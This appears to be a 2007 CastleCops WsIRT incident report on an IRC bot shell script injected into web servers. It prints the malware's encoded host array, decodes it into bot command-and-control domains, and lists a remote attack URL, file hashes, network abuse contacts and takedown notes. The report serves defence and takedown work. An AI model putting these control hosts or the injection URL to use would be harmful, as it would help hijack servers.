CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

$9736.22 of $21422.68
left sidedonated so farneed $11686.46 donated to reach our goalright side, our goal
Help CastleCops serve the community on new servers, Donate Here to reach our goal.

Donation/Premium
spacer
Donations. Become Premium Today! Premium Icon
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
Survey
spacer
Was 2007 a good year?

Yes it was a wonderful year
Yes, but there is always room for improvement
Status quo
It was a challenge
Other (leave comment)



Results
Polls

Votes: 937
Comments: 25
block bottom
spacer spacer

WsIRT(TM)

Webserver Incident Reporting and Termination(TM) Squad

NOTE: Web servers have logs and in those logs is evidence of attempted hacking. For instance, one may notice an attack that calls such a script from a remote server "r57.php??". Its these kinds of attacks we're looking to investigate. For a concrete example, see these reports.

Please do not submit phish, spam, or malware to WsIRT. Only submit attack signatures from web server logs. As this project hasn't officially been publicly launched, we are still reclassifying the tool and its verbiage.

[ How-To / FAQ ]

WsIRT -> Confirmed Attacks | Terminated Attacks


status: confirmed attack

HTTP Response
15 Jul, 2008
02:13:22		HTTP/1.1 302 Found
HTTP/1.1 200 OK
ID863 (termination link)
TitleIRC Bot Shell
Entry
WsIRT Squad
Reporter		Paul
Timestamp13 Dec, 2007 @ 00:22:14
Topic ID210364 - Read/respond to WsIRT commentary.
Handler Note:
13 Dec, 2007
00:33:14		Paul: This is the same IRC Bot Shell attacker script being used by troubled individuals as seen in the reports:

http://www.castlecops.com/IRC_Bot_Shell_attack649.html
http://www.castlecops.com/IRC_Bot_Shell_attack195.html

In fact, this one and 649 share the same hash fingerprint.

This script is being used by attackers injecting it onto remote web servers in an attempt to compromise them and take ownership of them for ill intent. Please remove immediately.

array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWV KHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDV I7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo 5eMipjHlm6RiZU=");

Translates to:

mymusicband.weedns.com
myphonenumber.weedns.com
ieatironx.weedns.com
himan.opendns.be
ko.dd.blueline.be
p4n33123e.dd.blueline.be
xphon3.opendns.be
myphone3.dnip.net
mymusics.dnip.net
Handler Note:
13 Dec, 2007
00:33:39		Paul: View CIDR AS8342 Report: http://www.cidr-report.org/cgi-bin/as-report?as=8342

"8342 | RU | ripencc | 1997-06-11 | RTCOMM-AS RTComm.RU Autonomous System"

Handler Note:
13 Dec, 2007
00:33:40		Paul: Extended information for AS8342:
State/Province:
Country: ru
Responsible Domain: rtcomm.ru
Abuse Email: security@rtcomm.ru
Handler Note:
13 Dec, 2007
00:34:45		Paul: View CIDR AS4713 Report: http://www.cidr-report.org/cgi-bin/as-report?as=4713

"4713 | JP | apnic | 1995-08-30 | OCN NTT Communications Corporation"

Handler Note:
13 Dec, 2007
00:34:45		Paul: Extended information for AS4713:
State/Province:
Country: jp
Responsible Domain: ocn.ad.jp
Abuse Email: abuse@ocn.ad.jp
Handler Note:
13 Dec, 2007
00:35:04		Paul: View CIDR AS3462 Report: http://www.cidr-report.org/cgi-bin/as-report?as=3462

"3462 | TW | apnic | 2002-08-01 | HINET Data Communication Business Group"

Handler Note:
13 Dec, 2007
00:35:05		Paul: Extended information for AS3462:
State/Province:
Country: tw
Responsible Domain: hinet.net
Abuse Email: cracker@hinet.net
Handler Note:
13 Dec, 2007
00:35:22		Paul: View CIDR AS21844 Report: http://www.cidr-report.org/cgi-bin/as-report?as=21844

"21844 | US | arin | 2001-06-29 | THEPLANET-AS - THE PLANET"

Handler Note:
13 Dec, 2007
00:35:22		Paul: Extended information for AS21844:
State/Province: tx
Country: us
Responsible Domain: theplanet.com
Abuse Email: abuse@theplanet.com
Handler Note:
13 Dec, 2007
00:35:35		Paul: View CIDR AS15703 Report: http://www.cidr-report.org/cgi-bin/as-report?as=15703

"15703 | NL | ripencc | 2000-09-19 | TRUESERVER-AS TrueServer BV AS number"

Handler Note:
13 Dec, 2007
00:35:35		Paul: Extended information for AS15703:
State/Province:
Country: nl
Responsible Domain: trueserver.nl
Abuse Email: abuse@true.nl
Handler Note:
13 Dec, 2007
00:35:47		Paul: View CIDR AS5617 Report: http://www.cidr-report.org/cgi-bin/as-report?as=5617

"5617 | PL | ripencc | 1996-04-29 | TPNET Polish Telecom_s commercial IP network"

Handler Note:
13 Dec, 2007
00:35:47		Paul: Extended information for AS5617:
State/Province:
Country: pl
Responsible Domain: tpnet.pl
Abuse Email: abuse@tpnet.pl
Handler Note:
13 Dec, 2007
00:35:57		Paul: View CIDR AS16317 Report: http://www.cidr-report.org/cgi-bin/as-report?as=16317

"16317 | SK | ripencc | 2001-02-23 | SK-4CALL 4CONSULT Ltd."

Handler Note:
13 Dec, 2007
00:35:57		Paul: Extended information for AS16317:
State/Province:
Country: sk
Responsible Domain: ipnet.sk
Abuse Email: security@ipnet.sk
Handler Note:
13 Dec, 2007
00:36:04		Paul: View CIDR AS35592 Report: http://www.cidr-report.org/cgi-bin/as-report?as=35592

"35592 | CZ | ripencc | 2005-09-13 | COOLHOUSING-AS COOLHOUSING Autonomous System"

Handler Note:
13 Dec, 2007
00:36:05		Paul: Extended information for AS35592:
State/Province:
Country: cz
Responsible Domain: network.cz
Abuse Email: abuse@network.cz
Handler Note:
13 Dec, 2007
00:38:05		Paul: View CIDR AS16742 Report: http://www.cidr-report.org/cgi-bin/as-report?as=16742

"16742 | CL | lacnic | 2000-06-05 | Universidad Catolica de Valparaiso"

Handler Note:
13 Dec, 2007
00:38:05		Paul: Extended information for AS16742:
State/Province:
Country: cl
Responsible Domain: ucv.cl
Abuse Email: abuse@ucv.cl
Handler Note:
13 Dec, 2007
00:38:05		Paul: ;; QUESTION SECTION:
;xphon3.opendns.be. IN A

;; ANSWER SECTION:
xphon3.opendns.be. 2560 IN A 158.251.4.149
Handler Note:
13 Dec, 2007
00:41:51		Paul: Generated and sent email attack alert to respective parties.
Handler Note:
13 Dec, 2007
01:43:05		Paul: Consumed following related reports:

[779] http://laudanskisucksss.chat.ru/placeholder/image?
Handler Note:
16 Dec, 2007
02:23:00		Paul: This link is still active. Please take down.
Handler Note:
16 Dec, 2007
02:23:08		Paul: Generated and sent email attack alert to respective parties.
Handler Note:
16 Dec, 2007
19:05:21		Paul: Sent a follow-up email to Yuri Ryazantsev asking for this to be taken down. A victim of this has contacted us in reference to this report being indexed on a search engine.
Fetched URLs
Slaves779,

Report for at 13 Dec, 2007 @ 00:22:11

fetched page

at 13 Dec, 2007 @ 00:22:13
MD5 Fingerprint: d646a4310ac0bcafbdc090e7d01ceaee
SHA1 Fingerprint: d8fc4c592d79a70f50207c34f6af15afd63d7be7
Version 1.0
2002-2008 © Computer Cops LLC dba CastleCops®. All rights reserved.
Acceptable Use Policy. Use signifies your agreement.
135ppm 0.152s (0.026s)
Making cybercriminals unhappy since 2002*
In Memory of Trpm
spacer spacer